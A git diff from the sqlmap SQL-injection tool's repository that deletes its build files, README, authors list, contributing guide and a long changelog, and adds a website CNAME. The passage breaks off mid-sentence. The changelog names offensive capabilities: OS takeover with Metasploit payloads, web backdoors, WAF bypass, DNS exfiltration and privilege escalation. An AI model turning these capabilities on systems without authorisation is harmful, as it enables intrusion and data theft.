diff --git a/.gitattributes b/.gitattributes deleted file mode 100644 index a6b6a352..00000000 --- a/.gitattributes +++ /dev/null @@ -1,14 +0,0 @@ -*.py text eol=lf -*.conf text eol=lf - -*_ binary -*.dll binary -*.pdf binary -*.so binary -*.wav binary -*.zip binary -*.x32 binary -*.x64 binary -*.exe binary -*.sln binary -*.vcproj binary diff --git a/.gitignore b/.gitignore deleted file mode 100644 index ff18ea79..00000000 --- a/.gitignore +++ /dev/null @@ -1,5 +0,0 @@ -*.py[cod] -output/ -.sqlmap_history -traffic.txt -*~ \ No newline at end of file diff --git a/.travis.yml b/.travis.yml deleted file mode 100644 index 7bfe0cef..00000000 --- a/.travis.yml +++ /dev/null @@ -1,6 +0,0 @@ -language: python -python: - - "2.6" - - "2.7" -script: - - python -c "import sqlmap; import sqlmapapi" diff --git a/CNAME b/CNAME new file mode 100644 index 00000000..be9bef93 --- /dev/null +++ b/CNAME @@ -0,0 +1 @@ +sqlmap.org diff --git a/README.md b/README.md index 3329bbef..d7f70ae0 100644 --- a/README.md +++ b/README.md @@ -1,64 +1 @@ -# sqlmap - -[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap) - -sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. - -Screenshots ----- - -![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png) - -You can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of features on the wiki. - -Installation ----- - -You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or latest zipball by clicking [here](https://github.com/sqlmapproject/sqlmap/zipball/master). - -Preferably, you can download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository: - - git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev - -sqlmap works out of the box with [Python](http://www.python.org/download/) version **2.6.x** and **2.7.x** on any platform. - -Usage ----- - -To get a list of basic options and switches use: - - python sqlmap.py -h - -To get a list of all options and switches use: - - python sqlmap.py -hh - -You can find a sample run [here](https://gist.github.com/stamparm/5335217). -To get an overview of sqlmap capabilities, list of supported features and description of all options and switches, along with examples, you are advised to consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki). - -Links ----- - -* Homepage: http://sqlmap.org -* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master) -* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom -* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues -* User's manual: https://github.com/sqlmapproject/sqlmap/wiki -* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ -* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users -* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap -* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap -* Twitter: [@sqlmap](https://twitter.com/sqlmap) -* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos) -* Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots - -Translations ----- - -* [Chinese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-zh-CN.md) -* [Croatian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-hr-HR.md) -* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md) -* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md) -* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md) -* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md) -* [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md) +sqlmap.org website diff --git a/doc/AUTHORS b/doc/AUTHORS deleted file mode 100644 index d3758d67..00000000 --- a/doc/AUTHORS +++ /dev/null @@ -1,7 +0,0 @@ -Bernardo Damele Assumpcao Guimaraes (@inquisb) - - -Miroslav Stampar (@stamparm) - - -You can contact both developers by writing to dev@sqlmap.org diff --git a/doc/CHANGELOG.md b/doc/CHANGELOG.md deleted file mode 100644 index deae85e4..00000000 --- a/doc/CHANGELOG.md +++ /dev/null @@ -1,368 +0,0 @@ -# Version 1.0 (2016-02-27) - -* Implemented support for automatic decoding of page content through detected charset. -* Implemented mechanism for proper data dumping on DBMSes not supporting `LIMIT/OFFSET` like mechanism(s) (e.g. Microsoft SQL Server, Sybase, etc.). -* Major improvements to program stabilization based on user reports. -* Added new tampering scripts avoiding popular WAF/IPS/IDS mechanisms. -* Fixed major bug with DNS leaking in Tor mode. -* Added wordlist compilation made of the most popular cracking dictionaries. -* Implemented multi-processor hash cracking routine(s). -* Implemented advanced detection techniques for inband and time-based injections by usage of standard deviation method. -* Old resume files are now deprecated and replaced by faster SQLite based session mechanism. -* Substantial code optimization and smaller memory footprint. -* Added option `-m` for scanning multiple targets enlisted in a given textual file. -* Added option `--randomize` for randomly changing value of a given parameter(s) based on it's original form. -* Added switch `--force-ssl` for forcing usage of SSL/HTTPS requests. -* Added option `--host` for manually setting HTTP Host header value. -* Added option `--eval` for evaluating provided Python code (with resulting parameter values) right before the request itself. -* Added option `--skip` for skipping tests for given parameter(s). -* Added switch `--titles` for comparing pages based only on their titles. -* Added option `--charset` for forcing character encoding used for data retrieval. -* Added switch `--check-tor` for checking if Tor is used properly. -* Added option `--crawl` for multithreaded crawling of a given website starting from the target url. -* Added option `--csv-del` for manually setting delimiting character used in CSV output. -* Added switch `--hex` for using DBMS hex conversion function(s) for data retrieval. -* Added switch `--smart` for conducting through tests only in case of positive heuristic(s). -* Added switch `--check-waf` for checking of existence of WAF/IPS/IDS protection. -* Added switch `--schema` to enumerate DBMS schema: shows all columns of all databases' tables. -* Added switch `--count` to count the number of entries for a specific table or all database(s) tables. -* Major improvements to switches `--tables` and `--columns`. -* Takeover switch `--os-pwn` improved: stealthier, faster and AV-proof. -* Added switch `--mobile` to imitate a mobile device through HTTP User-Agent header. -* Added switch `-a` to enumerate all DBMS data. -* Added option `--alert` to run host OS command(s) when SQL injection is found. -* Added option `--answers` to set user answers to asked questions during sqlmap run. -* Added option `--auth-file` to set HTTP authentication PEM cert/private key file. -* Added option `--charset` to force character encoding used during data retrieval. -* Added switch `--check-tor` to force checking of proper usage of Tor. -* Added option `--code` to set HTTP code to match when query is evaluated to True. -* Added option `--cookie-del` to set character to be used while splitting cookie values. -* Added option `--crawl` to set the crawling depth for the website starting from the target URL. -* Added option `--crawl-exclude` for setting regular expression for excluding pages from crawling (e.g. `"logout"`). -* Added option `--csrf-token` to set the parameter name that is holding the anti-CSRF token. -* Added option `--csrf-url` for setting the URL address for extracting the anti-CSRF token. -* Added option `--csv-del` for setting the delimiting character that will be used in CSV output (default `,`). -* Added option `--dbms-cred` to set the DBMS authentication credentials (user:password). -* Added switch `--dependencies` for turning on the checking of missing (non-core) sqlmap dependencies. -* Added switch `--disable-coloring` to disable console output coloring. -* Added option `--dns-domain` to set the domain name for usage in DNS exfiltration attack(s). -* Added option `--dump-format` to set the format of dumped data (`CSV` (default), `HTML` or `SQLITE`). -* Added option `--eval` for setting the Python code that will be evaluated before the request. -* Added switch `--force-ssl` to force usage of SSL/HTTPS. -* Added switch `--hex` to force usage of DBMS hex function(s) for data retrieval. -* Added option `-H` to set extra HTTP header (e.g. `"X-Forwarded-For: 127.0.0.1"`). -* Added switch `-hh` for showing advanced help message. -* Added option `--host` to set the HTTP Host header value. -* Added switch `--hostname` to turn on retrieval of DBMS server hostname. -* Added switch `--hpp` to turn on the usage of HTTP parameter pollution WAF bypass method. -* Added switch `--identify-waf` for turning on the thorough testing of WAF/IPS/IDS protection. -* Added switch `--ignore-401` to ignore HTTP Error Code 401 (Unauthorized). -* Added switch `--invalid-bignum` for usage of big numbers while invalidating values. -* Added switch `--invalid-logical` for usage of logical operations while invalidating values. -* Added switch `--invalid-string` for usage of random strings while invalidating values. -* Added option `--load-cookies` to set the file containing cookies in Netscape/wget format. -* Added option `-m` to set the textual file holding multiple targets for scanning purposes. -* Added option `--method` to force usage of provided HTTP method (e.g. `PUT`). -* Added switch `--no-cast` for turning off payload casting mechanism. -* Added switch `--no-escape` for turning off string escaping mechanism. -* Added option `--not-string` for setting string to be matched when query is evaluated to False. -* Added switch `--offline` to force work in offline mode (i.e. only use session data). -* Added option `--output-dir` to set custom output directory path. -* Added option `--param-del` to set character used for splitting parameter values. -* Added option `--pivot-column` to set column name that will be used while dumping tables by usage of pivot(ing). -* Added option `--proxy-file` to set file holding proxy list. -* Added switch `--purge-output` to turn on safe removal of all content(s) from output directory. -* Added option `--randomize` to set parameter name(s) that will be randomly changed during sqlmap run. -* Added option `--safe-post` to set POST data for sending to safe URL. -* Added option `--safe-req` for loading HTTP request from a file that will be used during sending to safe URL. -* Added option `--skip` to skip testing of given parameter(s). -* Added switch `--skip-static` to skip testing parameters that not appear dynamic. -* Added switch `--skip-urlencode` to skip URL encoding of payload data. -* Added switch `--skip-waf` to skip heuristic detection of WAF/IPS/IDS protection. -* Added switch `--smart` to conduct thorough tests only if positive heuristic(s). -* Added option `--sql-file` for setting file(s) holding SQL statements to be executed (in case of stacked SQLi). -* Added switch `--sqlmap-shell` to turn on interactive sqlmap shell prompt. -* Added option `--test-filter` for test filtration by payloads and/or titles (e.g. `ROW`). -* Added option `--test-skip` for skiping tests by payloads and/or titles (e.g. `BENCHMARK`). -* Added switch `--titles` to turn on comparison of pages based only on their titles. -* Added option `--tor-port` to explicitly set Tor proxy port. -* Added option `--tor-type` to set Tor proxy type (`HTTP` (default), `SOCKS4` or `SOCKS5`). -* Added option `--union-from` to set table to be used in `FROM` part of UNION query SQL injection. -* Added option `--where` to set `WHERE` condition to be used during the table dumping. -* Added option `-X` to exclude DBMS database table column(s) from enumeration. -* Added option `-x` to set URL of sitemap(.xml) for target(s) parsing. -* Added option `-z` for usage of short mnemonics (e.g. `"flu,bat,ban,tec=EU"`). - -# Version 0.9 (2011-04-10) - -* Rewritten SQL injection detection engine. -* Support to directly connect to the database without passing via a SQL injection, option `-d`. -* Added full support for both time-based blind SQL injection and error-based SQL injection techniques. -* Implemented support for SQLite 2 and 3. -* Implemented support for Firebird. -* Implemented support for Microsoft Access, Sybase and SAP MaxDB. -* Extended old `--dump -C` functionality to be able to search for specific database(s), table(s) and column(s), option `--search`. -* Added support to tamper injection data with option `--tamper`. -* Added automatic recognition of password hashes format and support to crack them with a dictionary-based attack. -* Added support to enumerate roles on Oracle, `--roles` switch. -* Added support for SOAP based web services requests. -* Added support to fetch unicode data. -* Added support to use persistent HTTP(s) connection for speed improvement, switch `--keep-alive`. -* Implemented several optimization switches to speed up the exploitation of SQL injections. -* Support to test and inject against HTTP Referer header. -* Implemented HTTP(s) proxy authentication support, option `--proxy-cred`. -* Implemented feature to speedup the enumeration of table names. -* Support for customizable HTTP(s) redirections. -* Support to replicate the back-end DBMS tables structure and entries in a local SQLite 3 database, switch `--replicate`. -* Support to parse and test forms on target url, switch `--forms`. -* Added switches to brute-force tables names and columns names with a dictionary attack, `--common-tables` and `--common-columns`. Useful for instance when system table `information_schema` is not available on MySQL. -* Basic support for REST-style URL parameters by using the asterisk (`*`) to mark where to test for and exploit SQL injection. -* Added safe URL feature, `--safe-url` and `--safe-freq`. -* Added switch `--text-only` to strip from the HTTP response body the HTML/JS code and compare pages based only on their textual content. -* Implemented few other features and switches. -* Over 100 bugs fixed. -* Major code refactoring. -* User's manual updated. - -# Version 0.8 (2010-03-14) - -* Support to enumerate and dump all databases' tables containing user provided column(s) by specifying for instance `--dump -C user,pass`. Useful to identify for instance tables containing custom application credentials. -* Support to parse `-C` (column name(s)) when fetching columns of a table with `--columns`: it will enumerate only columns like the provided one(s) within the specified table. -* Support for takeover features on PostgreSQL 8.4. -* Enhanced `--priv-esc` to rely on new Metasploit Meterpreter's 'getsystem' command to elevate privileges of the user running the back-end DBMS instance to SYSTEM on Windows. -* Automatic support in `--os-pwn` to use the web uploader/backdoor to upload and execute the Metasploit payload stager when stacked queries SQL injection is not supported, for instance on MySQL/PHP and MySQL/ASP, but there is a writable folder within the web server document root. -* Fixed web backdoor functionality for `--os-cmd`, `--os-shell` and `--os-pwn` useful when web application does not support stacked queries. -* Added support to properly read (`--read-file`) also binary files via PostgreSQL by injecting sqlmap new `sys_fileread()` user-defined function. -* Updated active fingerprint and comment injection fingerprint for MySQL 5.1, MySQL 5.4 and MySQL 5.5. -* Updated active fingerprint for PostgreSQL 8.4. -* Support for NTLM authentication via python-ntlm third party library, http://code.google.com/p/python-ntlm/, `--auth-type NTLM`. -* Support to automatically decode `deflate`, `gzip` and `x-gzip` HTTP responses. -* Support for Certificate authentication, `--auth-cert` option added. -* Added support for regular expression based scope when parsing Burp or Web Scarab proxy log file (`-l`), `--scope`. -* Added option `-r` to load a single HTTP request from a text file. -* Added switch `--ignore-proxy` to ignore the system default HTTP proxy. -* Added support to ignore Set-Cookie in HTTP responses, `--drop-set-cookie`. -* Added support to specify which Google dork result page to parse, `--gpage` to be used together with `-g`. -* Major bug fix and enhancements to the multi-threading (`--threads`) functionality. -* Fixed URL encoding/decoding of GET/POST parameters and Cookie header. -* Refactored `--update` to use `python-svn` third party library if available or `svn` command to update sqlmap to the latest development version from subversion repository. -* Major bugs fixed. -* Cleanup of UDF source code repository, https://svn.sqlmap.org/sqlmap/trunk/sqlmap/extra/udfhack. -* Major code cleanup. -* Added simple file encryption/compression utility, extra/cloak/cloak.py, used by sqlmap to decrypt on the fly Churrasco, UPX executable and web shells consequently reducing drastically the number of anti-virus softwares that mistakenly mark sqlmap as a malware. -* Updated user's manual. -* Created several demo videos, hosted on YouTube (http://www.youtube.com/user/inquisb) and linked from http://sqlmap.org/demo.html. - -# Version 0.8 release candidate (2009-09-21) - -* Major enhancement to the Microsoft SQL Server stored procedure heap-based buffer overflow exploit (`--os-bof`) to automatically bypass DEP memory protection. -* Added support for MySQL and PostgreSQL to execute Metasploit shellcode via UDF 'sys_bineval' (in-memory, anti-forensics technique) as an option instead of uploading the standalone payload stager executable. -* Added options for MySQL, PostgreSQL and Microsoft SQL Server to read/add/delete Windows registry keys. -* Added options for MySQL and PostgreSQL to inject custom user-defined functions. -* Added support for `--first` and `--last` so the user now has even more granularity in what to enumerate in the query output. -* Minor enhancement to save the session by default in 'output/hostname/session' file if `-s` option is not specified. -* Minor improvement to automatically remove sqlmap created temporary files from the DBMS underlying file system. -* Minor bugs fixed. -* Major code refactoring. - -# Version 0.7 (2009-07-25) - -* Adapted Metasploit wrapping functions to work with latest 3.3 development version too. -* Adjusted code to make sqlmap 0.7 to work again on Mac OSX too. -* Reset takeover OOB features (if any of `--os-pwn`, `--os-smbrelay` or `--os-bof` is selected) when running under Windows because msfconsole and msfcli are not supported on the native Windows Ruby interpreter. This make sqlmap 0.7 to work again on Windows too. -* Minor improvement so that sqlmap tests also all parameters with no value (eg. par=). -* HTTPS requests over HTTP proxy now work on either Python 2.4, 2.5 and 2.6+. -* Major bug fix to sql-query/sql-shell features. -* Major bug fix in `--read-file` option. -* Major silent bug fix to multi-threading functionality. -* Fixed the web backdoor functionality (for MySQL) when (usually) stacked queries are not supported and `--os-shell` is provided. -* Fixed MySQL 'comment injection' version fingerprint. -* Fixed basic Microsoft SQL Server 2000 fingerprint. -* Many minor bug fixes and code refactoring. - -# Version 0.7 release candidate (2009-04-22) - -* Added support to execute arbitrary commands on the database server underlying operating system either returning the standard output or not via UDF injection on MySQL and PostgreSQL and via xp_cmdshell() stored procedure on Microsoft SQL Server; -* Added support for out-of-band connection between the attacker box and the database server underlying operating system via stand-alone payload stager created by Metasploit and supporting Meterpreter, shell and VNC payloads for both Windows and Linux; -* Added support for out-of-band connection via Microsoft SQL Server 2000 and 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploitation with multi-stage Metasploit payload support; -* Added support for out-of-band connection via SMB reflection attack with UNC path request from the database server to the attacker box by using the Metasploit smb_relay exploit; -* Added support to read and write (upload) both text and binary files on the database server underlying file system for MySQL, PostgreSQL and Microsoft SQL Server; -* Added database process' user privilege escalation via Windows Access Tokens kidnapping on MySQL and Microsoft SQL Server via either Meterpreter's incognito extension or Churrasco stand-alone executable; -* Speed up the inference algorithm by providing the minimum required charset for the query output; -* Major bug fix in the comparison algorithm to correctly handle also the case that the url is stable and the False response changes the page content very little; -* Many minor bug fixes, minor enhancements and layout adjustments. - -# Version 0.6.4 (2009-02-03) - -* Major enhancement to make the comparison algorithm work properly also on url not stables automatically by using the difflib Sequence Matcher object; -* Major enhancement to support SQL data definition statements, SQL data manipulation statements, etc from user in SQL query and SQL shell if stacked queries are supported by the web application technology; -* Major speed increase in DBMS basic fingerprint; -* Minor enhancement to support an option (`--is-dba`) to show if the current user is a database management system administrator; -* Minor enhancement to support an option (`--union-tech`) to specify the technique to use to detect the number of columns used in the web application SELECT statement: NULL bruteforcing (default) or ORDER BY clause bruteforcing; -* Added internal support to forge CASE statements, used only by `--is-dba` query at the moment; -* Minor layout adjustment to the `--update` output; -* Increased default timeout to 30 seconds; -* Major bug fix to correctly handle custom SQL "limited" queries on Microsoft SQL Server and Oracle; -* Major bug fix to avoid tracebacks when multiple targets are specified and one of them is not reachable; -* Minor bug fix to make the Partial UNION query SQL injection technique work properly also on Oracle and Microsoft SQL Server; -* Minor bug fix to make the `--postfix` work even if `--prefix` is not provided; -* Updated documentation. - -# Version 0.6.3 (2008-12-18) - -* Major enhancement to get list of targets to test from Burp proxy (http://portswigger.net/suite/) requests log file path or WebScarab proxy (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project) 'conversations/' folder path by providing option -l ; -* Major enhancement to support Partial UNION query SQL injection technique too; -* Major enhancement to test if the web application technology supports stacked queries (multiple statements) by providing option `--stacked-test` which will be then used someday also by takeover functionality; -* Major enhancement to test if the injectable parameter is affected by a time based blind SQL injection technique by providing option `--time-test`; -* Minor enhancement to fingerprint the web server operating system and the web application technology by parsing some HTTP response headers; -* Minor enhancement to fingerprint the back-end DBMS operating system by parsing the DBMS banner value when -b option is provided; -* Minor enhancement to be able to specify the number of seconds before timeout the connection by providing option `--timeout #`, default is set to 10 seconds and must be 3 or higher; -* Minor enhancement to be able to specify the number of seconds to wait between each HTTP request by providing option `--delay #`; -* Minor enhancement to be able to get the injection payload `--prefix` and `--postfix` from user; -* Minor enhancement to be able to enumerate table columns and dump table entries, also when the database name is not provided, by using the current database on MySQL and Microsoft SQL Server, the 'public' scheme on PostgreSQL and the 'USERS' TABLESPACE_NAME on Oracle; -* Minor enhancemet to support also `--regexp`, `--excl-str` and `--excl-reg` options rather than only `--string` when comparing HTTP responses page content; -* Minor enhancement to be able to specify extra HTTP headers by providing option `--headers`. By default Accept, Accept-Language and Accept-Charset headers are set; -* Minor improvement to be able to provide CU (as current user) as user value (`-U`) when enumerating users privileges or users passwords; -* Minor improvements to sqlmap Debian package files; -* Minor improvement to use Python psyco (http://psyco.sourceforge.net/) library if available to speed up the sqlmap algorithmic operations; -* Minor improvement to retry the HTTP request up to three times in case an exception is raised during the connection to the target url; -* Major bug fix to correctly enumerate columns on Microsoft SQL Server; -* Major bug fix so that when the user provide a SELECT statement to be processed with an asterisk as columns, now it also work if in the FROM there is no database name specified; -* Minor bug fix to correctly dump table entries when the column is provided; -* Minor bug fix to correctly handle session.error, session.timeout and httplib.BadStatusLine exceptions in HTTP requests; -* Minor bug fix to correctly catch connection exceptions and notify to the user also if they occur within a thread; -* Increased default output level from 0 to 1; -* Updated documentation. - -# Version 0.6.2 (2008-11-02) - -* Major bug fix to correctly dump tables entries when `--stop` is not specified; -* Major bug fix so that the users' privileges enumeration now works properly also on both MySQL < 5.0 and MySQL >= 5.0; -* Major bug fix when the request is POST to also send the GET parameters if any have been provided; -* Major bug fix to correctly update sqlmap to the latest stable release with command line `--update`; -* Major bug fix so that when the expected value of a query (count variable) is an integer and, for some reasons, its resumed value from the session file is a string or a binary file, the query is executed again and its new output saved to the session file; -* Minor bug fix in MySQL comment injection fingerprint technique; -* Minor improvement to correctly enumerate tables, columns and dump tables entries on Oracle and on PostgreSQL when the database name is not 'public' schema or a system database; -* Minor improvement to be able to dump entries on MySQL < 5.0 when database name, table name and column(s) are provided; -* Updated the database management system fingerprint checks to correctly identify MySQL 5.1.x, MySQL 6.0.x and PostgreSQL 8.3; -* More user-friendly warning messages. - -# Version 0.6.1 (2008-08-20) - -* Major bug fix to blind SQL injection bisection algorithm to handle an exception; -* Added a Metasploit Framework 3 auxiliary module to run sqlmap; -* Implemented possibility to test for and inject also on LIKE statements; -* Implemented `--start` and `--stop` options to set the first and the last table entry to dump; -* Added non-interactive/batch-mode (`--batch`) option to make it easy to wrap sqlmap in Metasploit and any other tool; -* Minor enhancement to save also the length of query output in the session file when retrieving the query output length for ETA or for resume purposes; -* Changed the order sqlmap dump table entries from column by column to row by row. Now it also dumps entries as they are stored in the tables, not forcing the entries' order alphabetically anymore; -* Minor bug fix to correctly handle parameters' value with `%` character. - -# Version 0.6 (2008-09-01) - -* Complete code refactor and many bugs fixed; -* Added multithreading support to set the maximum number of concurrent HTTP requests; -* Implemented SQL shell (`--sql-shell`) functionality and fixed SQL query (`--sql-query`, before called `-e`) to be able to run whatever SELECT statement and get its output in both inband and blind SQL injection attack; -* Added an option (`--privileges`) to retrieve DBMS users privileges, it also notifies if the user is a DBMS administrator; -* Added support (`-c`) to read options from configuration file, an example of valid INI file is sqlmap.conf and support (`--save`) to save command line options on a configuration file; -* Created a function that updates the whole sqlmap to the latest stable version available by running sqlmap with `--update` option; -* Created sqlmap .deb (Debian, Ubuntu, etc.) and .rpm (Fedora, etc.) installation binary packages; -* Created sqlmap .exe (Windows) portable executable; -* Save a lot of more information to the session file, useful when resuming injection on the same target to not loose time on identifying injection, UNION fields and back-end DBMS twice or more times; -* Improved automatic check for parenthesis when testing and forging SQL query vector; -* Now it checks for SQL injection on all GET/POST/Cookie parameters then it lets the user select which parameter to perform the injection on in case that more than one is injectable; -* Implemented support for HTTPS requests over HTTP(S) proxy; -* Added a check to handle NULL or not available queries output; -* More entropy (randomStr() and randomInt() functions in lib/core/common.py) in inband SQL injection concatenated query and in AND condition checks; -* Improved XML files structure; -* Implemented the possibility to change the HTTP Referer header; -* Added support to resume from session file also when running with inband SQL injection attack; -* Added an option (`--os-shell`) to execute operating system commands if the back-end DBMS is MySQL, the web server has the PHP engine active and permits write access on a directory within the document root; -* Added a check to assure that the provided string to match (`--string`) is within the page content; -* Fixed various queries in XML file; -* Added LIMIT, ORDER BY and COUNT queries to the XML file and adapted the library to parse it; -* Fixed password fetching function, mainly for Microsoft SQL Server and reviewed the password hashes parsing function; -* Major bug fixed to avoid tracebacks when the testable parameter(s) is dynamic, but not injectable; -* Enhanced logging system: added three more levels of verbosity to show also HTTP sent and received traffic; -* Enhancement to handle Set-Cookie from target url and automatically re-establish the Session when it expires; -* Added support to inject also on Set-Cookie parameters; -* Implemented TAB completion and command history on both `--sql-shell` and `--os-shell`; -* Renamed some command line options; -* Added a conversion library; -* Added code schema and reminders for future developments; -* Added Copyright comment and $Id$; -* Updated the command line layout and help messages; -* Updated some docstrings; -* Updated documentation files. - -# Version 0.5 (2007-11-04) - -* Added support for Oracle database management system -* Extended inband SQL injection functionality (`--union-use`) to all other possible queries since it only worked with `-e` and `--file` on all DMBS plugins; -* Added support to extract database users password hash on Microsoft SQL Server; -* Added a fuzzer function with the aim to parse HTML page looking for standard database error messages consequently improving database fingerprinting; -* Added support for SQL injection on HTTP Cookie and User-Agent headers; -* Reviewed HTTP request library (lib/request.py) to support the extended inband SQL injection functionality. Splitted getValue() into getInband() and getBlind(); -* Major enhancements in common library and added checkForBrackets() method to check if the bracket(s) are needed to perform a UNION query SQL injection attack; -* Implemented `--dump-all` functionality to dump entire DBMS data from all databases tables; -* Added support to exclude DBMS system databases' when enumeration tables and dumping their entries (`--exclude-sysdbs`); -* Implemented in Dump.dbTableValues() method the CSV file dumped data automatic saving in csv/ folder by default; -* Added DB2, Informix and Sybase DBMS error messages and minor improvements in xml/errors.xml; -* Major improvement in all three DBMS plugins so now sqlmap does not get entire databases' tables structure when all of database/table/ column are specified to be dumped; -* Important fixes in lib/option.py to make sqlmap properly work also with python 2.5 and handle the CSV dump files creation work also under Windows operating system, function __setCSVDir() and fixed also in lib/dump.py; -* Minor enhancement in lib/injection.py to randomize the number requested to test the presence of a SQL injection affected parameter and implemented the possibilities to break (q) the for cycle when using the google dork option (`-g`); -* Minor fix in lib/request.py to properly encode the url to request in case the "fixed" part of the url has blank spaces; -* More minor layout enhancements in some libraries; -* Renamed DMBS plugins; -* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements; -* Updated all documentation files. - -# Version 0.4 (2007-06-15) - -* Added DBMS fingerprint based also upon HTML error messages parsing defined in lib/parser.py which reads an XML file defining default error messages for each supported DBMS; -* Added Microsoft SQL Server extensive DBMS fingerprint checks based upon accurate '@@version' parsing matching on an XML file to get also the exact patching level of the DBMS; -* Added support for query ETA (Estimated Time of Arrival) real time calculation (`--eta`); -* Added support to extract database management system users password hash on MySQL and PostgreSQL (`--passwords`); -* Added docstrings to all functions, classes and methods, consequently released the sqlmap development documentation ; -* Implemented Google dorking feature (`-g`) to take advantage of Google results affected by SQL injection to perform other command line argument on their DBMS; -* Improved logging functionality: passed from banal 'print' to Python native logging library; -* Added support for more than one parameter in `-p` command line option; -* Added support for HTTP Basic and Digest authentication methods (`--basic-auth` and `--digest-auth`); -* Added the command line option `--remote-dbms` to manually specify the remote DBMS; -* Major improvements in union.UnionCheck() and union.UnionUse() functions to make it possible to exploit inband SQL injection also with database comment characters (`--` and `#`) in UNION query statements; -* Added the possibility to save the output into a file while performing the queries (`-o OUTPUTFILE`) so it is possible to stop and resume the same query output retrieving in a second time (`--resume`); -* Added support to specify the database table column to enumerate (`-C COL`); -* Added inband SQL injection (UNION query) support (`--union-use`); -* Complete code refactoring, a lot of minor and some major fixes in libraries, many minor improvements; -* Reviewed the directory tree structure; -* Splitted lib/common.py: inband injection functionalities now are moved to lib/union.py; -* Updated documentation files. - -# Version 0.3 (2007-01-20) - -* Added module for MS SQL Server; -* Strongly improved MySQL dbms active fingerprint and added MySQL comment injection check; -* Added PostgreSQL dbms active fingerprint; -* Added support for string match (`--string`); -* Added support for UNION check (`--union-check`); -* Removed duplicated code, delegated most of features to the engine in common.py and option.py; -* Added support for `--data` command line argument to pass the string for POST requests; -* Added encodeParams() method to encode url parameters before making http request; -* Many bug fixes; -* Rewritten documentation files; -* Complete code restyling. - -# Version 0.2 (2006-12-13) - -* complete refactor of entire program; -* added TODO and THANKS files; -* added some papers references in README file; -* moved headers to user-agents.txt, now -f parameter specifies a file (user-agents.txt) and randomize the selection of User-Agent header; -* strongly improved program plugins (mysqlmap.py and postgres.py), major enhancements: * improved active mysql fingerprint check_dbms(); * improved enumeration functions for both databases; * minor changes in the unescape() functions; -* replaced old inference algorithm with a new bisection algorithm. -* reviewed command line parameters, now with -p it's possible to specify the parameter you know it's vulnerable to sql injection, this way the script won't perform the sql injection checks itself; removed the TOKEN parameter; -* improved Common class, adding support for http proxy and http post method in hash_page; -* added OptionCheck class in option.py which performs all needed checks on command line parameters and values; -* added InjectionCheck class in injection.py which performs check on url stability, dynamics of parameters and injection on dynamic url parameters; -* improved output methods in dump.py; -* layout enhancement on main program file (sqlmap.py), adapted to call new option/injection classes and improvements on catching of exceptions. diff --git a/doc/CONTRIBUTING.md b/doc/CONTRIBUTING.md deleted file mode 100644 index 1de4a195..00000000 --- a/doc/CONTRIBUTING.md +++ /dev/null @@ -1,38 +0,0 @@ -# Contributing to sqlmap - -## Reporting bugs - -**Bug reports are welcome**! -Please report all bugs on the [issue tracker](https://github.com/sqlmapproject/sqlmap/issues). - -### Guidelines - -* Before you submit a bug report, search both [open](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aopen+is%3Aissue) and [closed](https://github.com/sqlmapproject/sqlmap/issues?q=is%3Aissue+is%3Aclosed) issues to make sure the issue has not come up before. Also, check the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) for anything relevant. -* Make sure you can reproduce the bug with the latest development version of sqlmap. -* Your report should give detailed instructions on how to reproduce the problem. If sqlmap raises an unhandled exception, the entire traceback is needed. Details of the unexpected behaviour are welcome too. A small test case (just a few lines) is ideal. -* If you are making an enhancement request, lay out the rationale for the feature you are requesting. *Why would this feature be useful?* -* If you are not sure whether something is a bug, or want to discuss a potential new feature before putting in an enhancement request, the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) is a good place to bring it up. - -## Submitting code changes - -All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve 